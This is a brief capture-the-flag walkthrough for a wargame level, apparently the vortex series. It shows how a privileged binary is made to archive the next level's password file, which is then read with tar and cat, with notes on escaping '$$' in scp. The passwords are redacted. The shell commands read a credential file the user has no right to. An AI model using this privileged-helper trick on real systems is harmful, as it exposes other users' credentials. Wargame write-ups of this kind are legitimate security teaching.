The binary from level 2 creates a special file, one whose name contains $$: ownership.$$.tar.
The $ variable [..] expands to the process ID of the shell. In a () subshell, it expands to the process ID of the invoking shell, not the subshell.bash manual page
This binary file has permissions to read the password file from the next level, so what we have to do is archive the password file, and then read it, taking into account the special file name.
First, to create the archive:
vortex2@melissa:/etc/vortex_pass$ /vortex/vortex2 vortex3 vortex3 vortex3 vortex2@melissa:/etc/vortex_pass$ ls -alh '/tmp/ownership.$$.tar' -rw-r--r-- 1 vortex3 vortex2 10K 2012-09-06 23:19 /tmp/ownership.$$.tar
File created. Now to untar and read the content:
We cannot untar it there, so the -O option (output to
STDOUT) is very useful :
vortex2@melissa:/etc/vortex_pass$ tar xf '/tmp/ownership.$$.tar' -O *****
We could copy it locally with
scp and untar it. I had a little problem with the file name passed forward by scp, which can be seen and adapted with verbose mode, then check the transmitted file name and adjust it:
scp -v email@example.com:'test$$' . [..] debug1: Sending command: scp -v -f test$$ scp: test415: No such file or directory
We see that $$ is transmitted, and will be interpreted, so it should be correctly escaped. Copy archive locally:
# scp firstname.lastname@example.org:'/tmp/ownership.\$\$.tar' .
tar command from the binary does not use compression, so the content of the archive can be viewed:
vortex2@melissa:/etc/vortex_pass$ cat '/tmp/ownership.$$.tar' [..] *****